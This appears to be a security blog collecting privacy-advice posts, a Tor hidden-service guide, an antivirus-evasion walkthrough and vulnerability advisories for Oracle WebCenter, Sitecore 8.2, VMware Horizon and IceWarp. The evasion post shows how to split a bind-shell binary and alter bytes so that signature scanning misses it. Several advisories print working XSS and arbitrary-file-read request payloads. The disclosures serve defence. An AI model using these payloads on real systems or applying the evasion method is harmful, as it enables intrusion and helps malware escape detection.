The Art of Privacy – Part 3

This is the best part of the whole series, as in this part I will tell you, what to do to protect yourself from prying eyes, whether the prying eyes are of hackers, or oppressing regimes (This is such a relative term 🙂 ). It’s usually such a good feeling when you realize and appreciate that your thoughts are your own, imagine if some of us could read your mind and could siphon off anything that you think and then mine the data and extract the useful bits of information and then use it. Well this is what is going on nowadays, in the cyber world, which has already been discussed previously (briefly) in this series.

So, how do I become invisible to everyone and even to a point where one has contingencies to if life turns into an iRobot’s plot.

The privacy protection can be divided into two parts:

Physical – In context of cyber

Cyber

Physical protection entails protection of your credit card data, protection of your phone’s screen information. Please keep in mind, this is not a tutorial to learn Kungfu and protect your wallet or phone from thieves, this is more in the context of what data an attacker can extract by not even making contact with you and how you can secure it, so that all the attacks are rendered unsuccessful.

Nowadays, if we notice, all credit/debit cards are contact-less, which means, in layman’s terms, you can just touch the point of sales machine with the card and you are good to go. It is a well-known fact that any threat agent can use cheap hardware to extract information from the credit card from afar. Same goes for the bus cards, tram/train tickets, etc. They all use RFID technology now.

The easiest way to protect them from an attack is to use a wallet with RFID protection. You can find many different kinds of wallets in the super market. If you love your own wallet, or your wife gave that as a gift and if you won’t use it, you will be sleeping outside of your house, then my friends, there is another solution, you can easily buy RFID protection sleeves which can hold your cards and then you can put them into your wallet. You can buy them from anywhere as well. I have been using the sleeves as well in my wallet. I got the F-Secure ones, work pretty well.

Information from the phones can be protected by adding a privacy screen protector on your phone. It comes for Android devices and iPhone/iPad/iWhatevertheycomeupwithNext.

Cyber based protection entails everything which is done online or offline, but dealing with the non-physical, bitbytes!! In case of Cyber, the threat actors have already been explained in the previous articles of this three part series.

The first thing one must and I say MUST do, is to install a VPN. VPNs are virtual private networks, which in a nutshell, encrypt all traffic between you and their server. Think of it as an underground tunnel which uses a special train which makes you invisible so you can easily pass through any barriers, and exit the city you want to exit undetected and then carry on. Usually when your traffic is going through the network, it looks like this (again a lot is going on but just to explain my point, it is illustrated so simply):

You ==> Your ISP — |Prying eyes| ===> Google/Facebook/Instagram/Blah/Blah and Blah

When you are going through a VPN:

You =|Encrypted tunnel|=> VPN server (ISP? WHO/WHAT?) ===> Google/Facebook/Instagram/Blah/Blah and Blah

So, that was that, VPN is a must if you want to stay anonymous, of course, one should never abuse this. Never do anything illegal!

The VPNs which I have personally used are F-Secure Freedome and Private Internet Access, which are quite good, with respect to price, log retention, speed.

Secondly, browser addons are your best friends. Addons like NoScript, Disable WebRTC, HTTPS Everywhere, uBlock Origin, User-Agent switcher. These are some of the addons for Mozilla Firefox. If you are a Chrome user then find equivalent addons.

Using proxies is usually not a good option to anonymize your traffic. As using WebRTC one can get your real IP, unless it is disabled on the browser side. Furthermore, by using Javascript one can extract your real IP. So, in short, don’t use proxies.

TOR is another good example of how to keep yourself anonymous. It is to note that TOR works as a proxy but it is untraceable. The operating system as well as all other apps which are not proxy aware and have not been explicitly provided, the IP for the proxy, they will connect to their respective services normally, and not through TOR.

Just to remember, if you are using TOR, never use your credentials on websites which do not run on HTTPS.

These are some of the things that Privacy health-conscious people use to protect themselves. I would recommend this to all the great readers out there.

Stay Safe.

 

~Peace

The Art of Privacy – Part 2

The biggest threat to privacy is the attitude of “AH, what would someone do with my email address, phone number or social security number”. Thanks to the awareness in security and security terminology becoming a fad and the names of attacks becoming more and more attractive, non-security savvy people are starting to somewhat understand the tricks malicious attackers use to lure people into giving out their private information.

Unfortunately, this isn’t enough. Privacy threat actors range from a 13 year old sitting on a computer to state sponsored hackers to law enforcement to advertising agencies, which technically are working within the bounds of the law and aren’t doing anything illegal.

The problem, which I have been talking for ages, is that there is so much unprotected personal information available on the internet that you cannot pin point and blame a specific person for taking the data and using it. We then have a problem of data leaks, for example the recent Equifax data leak. Data leaks and public dumps are a recent trend. In the early 2000’s there were more breaches because, well SQL Injection was new, even now SQL injection is almost 50% of the times, the reason of a breach, imagine when it was new, and google dorking was new, how many databases would have been dumped and would have roamed around in the underground but they never made the news or they weren’t available for anyone to download.

The dumps of emails and passwords leaked from Linkedin, Twitter etc. are now on several websites. As an example, please find the two websites below:

https://haveibeenpwned.com

https://hacked-emails.com/

Technically they do not show you the password for anyone else but just tell you if your email is in the hacked databases list, but they have all the raw data so…

I have been using a website called Pastebin for years now, which is quite valuable when it comes to find your leaked information. Google is also a very well-known platform for finding leaked information using google dorks.

Well, if we talk about data leaks, one can argue that it is not an individual’s fault that the data got leaked. It was because of an Apache Struts (Unpatched, though the patch was released like ages ago) vulnerability, 🙂 that the server got pwned! Yes, so that is not the individual’s fault. It is the individual’s fault when he is in the military and gives the whole detail about what he is doing and on which technology, so that anyone can track him down. What happens when people do that, you ask? ICWATCH happens!!!! It is also the individual’s fault, when he puts all his/her pictures public on Facebook or Instagram or any other social networking website. What someone can do with my picture from Facebook, you ask, it is not a social security number or your phone number, you say? I would just give an example, or two, of what they can do, apart from selling your picture to advertisers or a bad bad man getting a hold of your pictures, extracting the GPS location embedded into the pictures, thank you smartphones, and get your home address:

Example: So let’s talk about cryptocurrency, Bitcoin and the whole shebang. Oh, so, cryptocurrency is untraceable? Right? What do we do? Well, what the high end exchanges now do is that they require your picture taken from a camera and any photo-ID, for you to be able to get registered to that exchange and setup a wallet and so on. After that whatever transaction you do can be chained back to your account and inevitably to you. Unless you are using Monero!! So, about the attack, let’s call the attacker, “Evil Joe”! Evil Joe gets you selfie picture from Facebook which he/she conveniently finds online as it is public. Uses that picture for first round of verification and in the second round, uses a different picture and photoshops it onto a photo-ID, scans it and uploads it. Next, sets his username and password and boom, he has stolen your Face identity. Now whatever transaction he does, comes back to your face and as most law enforcement agencies have facial recognition, they will contact you and you are in trouble, at least until they are sure that you weren’t involved.

One, other scenario that I would like to briefly describe is that for example you have facial recognition on your Samsung S8. A thief steals your phone or purse (Ladies), what he can do with it, search your name on the internet, on Facebook, if he finds your public picture somewhere, where your face is prominent, he can use that to unlock your phone.

There are many other attacks, social engineering being the most effective, but for that I would refer to different books as this has been covered thoroughly by many people.

Recently, I saw a very well renowned political figure of A country, on twitter. She shared a picture of a document where she did not think of removing the name, phone number and social security number of another government official. I think that was because she has no concept of why exposing social security number is a very bad thing.

In the third part, I would explain how to protect yourself from these threat actors and how to be anonymous and invisible to prying eyes.

~Peace

The Art of Privacy – Part 1

This is a three-part special. The first part of this three-part special would include, what privacy means to a normal person, how it impacts the normal day-to-day life of that person, the facts about what is going on in the cyber world, in terms of privacy.

The second part would comprise of the mistakes that are made by people and the mindset that people have about internet privacy.

The third and the final part would include how you can protect yourself against attacks, even if you aren’t computer savvy. You will also be introduced to technologies being used nowadays to defend against privacy breaches.

Part 1:

Lets start with what privacy is, though all of you might already know what it is. Privacy is the right of an individual to keeps his/her’s private stuff, private. Technology is a part of our life now and unfortunately, the threat landscape is quite big, in terms privacy.

You might have heard about IOT (Internet of things) which means, all the devices that are connected to the internet and to each other, for example Cameras, locks, fridges etc. There have been many security concerns about IOT devices, which I will not be covering here.

Technology has become closely intertwined with our daily lives. Cell phones, for example, instead of having different devices for different tasks, now smart phones have everything in one package, such as GPS, 3G/4G, Bluetooth, NFC, which are technologies which have many applications in our day-to-day life. Internet, a technology that we are so dependent on, that a little disruption in it causes serious discomfort to us. These technologies, can be attacked to invade one’s privacy.

Security and Privacy have always had a love/hate relationship. Complete security requires privacy breach at some level, which becomes a problem in case of complete privacy. Last year General Data Protection Regulation (GDPR) was adopted in the EU which has several detailed points about the protection of privacy for the EU citizens and residents. This is a very good thing, but to be honest, this protects against our data on services such as Google, or any other corporate entities. What about hackers, intelligence agencies, cyber armies? How should we protect ourselves against them? How can we keep our personal information personal? Though I will tell the good readers on how to protect one’s privacy online, in the part 3 of this article.

Now, I would like to briefly talk about the attacks against privacy. Recently, we heard about NSA snooping into mobile networks and reading SMS etc. Due to the leaks, the world now knows about Hacking Team and Finfisher, which are the companies who blatantly sell command and control implants to governments and even law enforcement agencies, which were initially used to spy on activists, journalists, etc. Nowadays, due to the threat of increasing cybercrime, the implants might be used against normal people, if they are persons of interest to law enforcement. For example, the recent Surveillance law in Germany, which empowers the German police to read WhatsApp messages of people who become person of interest to the police. Though direct interception is not possible, most probably, they would be using some kind of social engineering technique to install the police controlled implant onto the cell phone of their target. Similar surveillance powers are or will be given to the police in the UK.

To be very clear, if the person has committed a crime and/or, well, if he is a bad guy, which is quite hard to know, unless it is Tom Cruise’s Minority Report, and there is a pre-crime unit, but still, I am completely in favor of this surveillance law, in that case. But knowing which of the suspect is a real bad guy and which of the suspects is an innocent, is quite hard to know, thus there would be quite a big range of false positives, who would lose their privacy as collateral.

There have been so many cases of identity thefts in different countries due to breaches, leaks, phishing etc. With your identity stolen, you can lose your bank accounts, can end up in the police wanted list, can come under serious debt, etc. Apart from identity theft, GPS spoofing, where you can be sent somewhere else and the information that you contain may be taken by force, cell phone hacking, television hacking and voice snooping, implants to intercept internet traffic at the ISP end, SMS interception, SS7 based attacks, all of which are attacks against normal people and which are used to compromise confidentiality and breach privacy of the intended targets.

I would be, in the end of this three-part article, mention different books covering privacy and how to be invisible.

Thanks for reading.

Part 2 would be coming out soon!

Peace!

Want to be heard and can’t register a domain?

Back when I had dial-up internet, I used to host stuff on my computers and give my public IP to friends so that they could enjoy or make use of, what I had to share. Back then there wasn’t any Facebook, hi5, orkut, or any chat mobile apps. The only cool thing we had was IRC (\\// Live long and prosper). I felt so empowered that I could host something on my computer and share it with friends, ok, so what if I got DOSed (denial of service), many times and my computer froze because, well I had windows 98 installed. That was the time when “Ping of death” was a thing. Good times though. Coming back to the topic, as I mentioned that I could host stuff online and ask people to connect to my IP, well the bandwidth was very poor so that model didn’t work so well, and did I mention, I got DOSed, many times. Nowadays, there are a lot of online services, free website hosting like “110mb.com, wordpress.com, blogger.com, etc”. Many people use these services and are super happy with it.

Sometimes you want to share something and want to keep it on your own computer. How do you do that? Well, some of you might say: “We have a DSL/Fiber connection, we can setup reverse NAT and we are good to go”. My answer to them is that what if your public IP changes? That becomes a problem! I recently saw this television program about Darknet and how only bad people use it and if you are a criminal, then you are on a Darknet. Well, all this is quite dramatic to be honest. Yes, criminals use it, but it wasn’t designed for them, they use it because of the anonymity features.

To solve the above mentioned problem, TOR can be used. Yes, TOR is an anonymizing software and can be used to host websites or any kind of service. There are some very simple steps to set it up. You can set it up on your computer or a raspberry pi. Follow the simple steps to install a hidden service:

  1. Install TOR, apt-get install tor
  2. Edit Tor configuration file: nano /etc/tor/torrc
  3. Find the section with hidden services and edit: HiddenServicePort <port on onion> 127.0.0.1:<mapped internal port>
  4. Setup a hidden service directory and add it to the config file </blah/hidden_service/>. Chmod it to 700 (Some times TOR complains about lose permissions)
  5. Run tor.. Get the onion domain name from the hostname file.
  6. Have fun!!!!

Once it is setup you can see your .onion domain name in the hostname file, but to access it you have to be in TOR network, but there is some good news as well, you can access it from the internet as well, via Tor2web. It is rather simple, really, if you have a domain, “myblahblahblahdomain.onion”, you just add a “.to” to the end and you are good to go. So, the end URL would be: “http://myblahblahblahdomain.onion.to/”.

That is it, you are good to go and enjoy your free hosting.

Antivirus Evasion

A few weekends back i was wondering how do malware evade antivirus solutions, is it really that easy ?

With that in mind i started looking at some known malware piece and randomly pick a anti malware solutions to my surprise AVs can still be tricked with old technique such as string substitution method, so today we will explore this very well known technique. For testing purpose i choose ncx as a test malware which binds itself on port 99 and when someone connects to ncx it gives command prompt of the system.

First let’s scan the default malware to check if it’s detected or not.

 

 

 

 

 

 

 

 

 

 

 

 

As it can be seen in below screenshot that ncx is detected by our antivirus

 

Let’s split file into small chunks, after a bit of trial and error i found that splitting into 17 bytes does not break any signature of av, the trick here is we have to keep splitting files as long as the av keeps flagging those files

 

On scanning split chunks two detection were made by our av i.e chunk 1 and 4 were identified as malicious

 

 

Change lower case ‘cmd’ to upper case ‘CMD’ and save it

 

 

Yes no more detection !

 

 

In sixth line of split chunk number 1 let’s change upper case ‘S’ to lower case ‘s’ and save it

 

 

Scan it again, and av no longer detects this chunk.

 

 

Finally join files back

 

 

Rename the joined file

 

 

Scan shows no more detection 🙂

 

 

And we can see on execution it is indeed listening on port 99

 

 

POC Video:-

 

Oracle Web Center XSS

Oracle Web Center XSS
Details
========================================================================================
Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: https://www.oracle.com/
CVE-ID: CVE-2017-10075
CVSS: 8.2

Credits
========================================================================================
Discovered by: Owais Mehtab & Tayeeb Rana


Affected Products:
========================================================================================
Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]

Description
========================================================================================
Two Cross site scripting (XSS) vulnerabilities have been identified in Oracle Web Center,
the vulnerability can be easily exploited and can be used to steal cookies,
perform phishing attacks and other various attacks compromising the security of a
user.

Proof of Concept
========================================================================================
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO


http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>

 


Solution
========================================================================================
Apply Oracle CPU July 2017

Downside of keeping everything public – ICWATCH

I have been writing and preaching about Social network information harvesting and why it is a bad thing (Check out the post here). I recently stumbled upon something, which is, publicly known though, but still worth mentioning. The mentioned “something” is a very good example of why too much information about one’s self is never a good idea.

I was having some fun with Riddler the other day. For those who do not know what Riddler is, well it is F-Secure’s search engine for web domains and much more. Unlike Shodan where all ports are scanned and then the headers are saved in a database, Riddler can be used to query about specific domains and subdomains and get some very very interesting information. So, as I was saying, that I was having fun with Riddler and I stumbled upon a strange subdomain of (Strange subdomain).

The ICWATCH, contains public database of mainly LinkedIn profiles of people in the United States government employees. Though the website is publicly known. It was quite astonishing to see how much information people have posted on their Linkedin accounts. It makes sense if someone is in sales or normal private sector job, but giving so much information and revealing what the person does, for intelligence community is, well not advised, in my opinion.

Back to the point, open-source intelligence (OSINT) is completely legal and any person/agency can easily gather information about anyone without committing a crime. I usually talk about advertisers, malicious hackers, social engineers etc, who use this to take advantage of the information collected and harm innocent users. People should keep in mind that tracking people across multiple social networking platforms is a trivial job nowadays, for a skilled hacker.

It is very important, not to disclose personal information on the internet. Especially social networks like Linkedin, Facebook, etc. Sharing personal stuff is never a bad thing, but people should be smart about what they share. If you are working for the government, there is no need of writing everything about what you do, on your Linkedin profile.

Peace!

Sitecore CMS v 8.2, cross site scripting & arbitrary file access

Hi folks,

Multiple vulnerabilities were found in the Sitecore version 8.2. Which were reported to Sitecore CMS on the 5th of May,2017. A patch was released on the 27th of June, 2017. It is recommended to update the Sitecore CMS installation. The exploit is being made public after the patch has been released.

Exploit:[CVE-2017-11439, CVE-2017-11440]

Product: Sitecore
Version: 8.2, Rev: 161221, Date: 21st December, 2016
Date: 05-05-2017
Author: Usman Saeed
Email: usman@xc0re.net

Disclaimer: Everything mentioned below is for educational puposes. The vulnerability details are mentioned as is. I would not be held responsible for any misuse of this information.

Summary:
Multiple vulnerabilities were found in the Sitecore product. The vulnerabilities include two instances of arbitrary file access and once instance of reflected cosssite scripting.

1: Arbitrary file access:

– Description:

The vulnerability lies in the tools which can be accessed via the administrator user. The vulnerability exists because there is no bound check for absolute path in the application, that is, if the absolute path is provided to the vulnerable URL, it reads the path and shows the contents of the file requested.

– Exploit:
1. Once authenticated as the administrator perform a GET request to the followiung URL:
/sitecore/shell/Applications/Layouts/IDE.aspx?fi=c:\windows\win.ini

2. Once authenticated as the administrator perform a POST request to the followiung URL:

POST /sitecore/admin/LinqScratchPad.aspx HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1

__VIEWSTATE= <OMITTED> &__VIEWSTATEGENERATOR= <OMITTED> &__EVENTVALIDATION= <OMITTED> &LinqQuery=%0D%0A&Reference=c%3A%5Cwindows%5Cwin.ini&Fetch=

 

2. Reflected Cross-site Scripting:
– Description:
The application does not sanatize the USER input which allows a normal authenticated user to exploit this vulnerability.

 

– Exploit:

POST /sitecore/shell/Applications/Tools/Run HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: <OMITTED>
Content-Length: 518
Cookie: <OMITTED>

&__PARAMETERS=run%3Aok&__EVENTTARGET=&__EVENTARGUMENT=&__SOURCE=&__EVENTTYPE=click&__CONTEXTMENU=&__MODIFIED=1&__ISEVENT=1&__SHIFTKEY=&__CTRLKEY=&__ALTKEY=&__BUTTON=0&__KEYCODE=undefined&__X=1763&__Y=883&__URL=https%3A// <OMITTED> /sitecore/shell/Applications/Tools/Run&__CSRFTOKEN= <OMITTED> &__VIEWSTATE= <OMITTED> &__VIEWSTATE=&Program=%3F%3E%3C%3F%3E%3Ciframe%20src%3D%22Javascript%3Aalert(document.cookie)%3B%22%3E%3C%2Fiframe%3E

++++++++++++++++++++++++++++++++++++++++++++++++++++

Time-Line:

  • Initial inquiry – May 5, 2017
  • Vulnerability advisory submission – May 5, 2017
  • Patch release – June 27, 2017
  • Publicly released – July 3, 2017

 

 

VMWare Horizon View Client <= 5.4 DLL Hijacking

During one of the pentest assignment i had to perform security assessment for VMWare Horizon View Client, since it’s native windows application the attack vectors are different than normal web apps. I started looking at the memory then traffic then registries found nothing, i was at a total loss…. Fortunately since it’s a native application it must require some dlls, so there are pretty good chances that developers might forgot to explicitly call dlls via complete path, what does that mean ? So lets say an application requires abc.dll and it just calls it by referring call abc.dll windows will look for abc.dll in following order:-

  • The directory from which the application loaded.
  • System directory (C:\Windows\Syswow64).
  • System directory (C:\Windows\System32).
  • The 16-bit system directory (C:\Windows\System).
  • The Windows directory (C:\Windows).
  • The Current Directory.
  • Directories that are listed in the PATH variables.

I fired up process minitor with following rules:-

Next i started the application to see which dlls are missing.

So As we can see that Trutil.dll is required by the application and it’s clearly missing

Once the application is launched we will get reverse shell….sweet!!!

 

 

ICEWARP Multiple Clients, Persistent Cross Site Scripting (XSS)

[Re-post] Original Post, posted on: 15th Feb, 2014 on Xc0re blog.

While going through the Icewarp client I found that  it is possible to inject malicious HTML Element tags into the email and cause a Cross site Scripting (XSS) payload to be executed.

The versions that I tested on, were  :

  • 11.0.0.0 (2014-01-25) x64  (http://demo.icewarp.com/)
  • 10.3.4

————–

The details about the POC are as follows :

It was observed that the ICEWARP Client Version 10.3.4 is vulnerable to tag as well as tag.  Any attacker can create a specially crafted message and inject it into the Signature and as soon as the signature is loaded it will execute the XSS payload.

The Latest ICEWARP Client version 11.0.0 was tested on ICEWARPs own website : demo.icewarp.com and was observed that it filters the tag but does not filter the tag thus allowing the injection of malicious payload into the Signature portion and as soon as the signature is selected , it executes the payload. On further testing it was found that the vulnerability found in this version  can not qualify as a complete persistent vulnerability but in order to attack one has to use social engineering for the person to paste and execute.

Once the XSS payload was embedded , it always executed when the compose email was clicked but once the email was saved as draft , the payload disappeared.  It was noticable that in the signature box when we embedded >alert(1); , it got filtered immediately and never carried to the compose email but with Embed and Object tag it did execute on the compose email level.

Proof Of Concept
=================

Can be found here:—–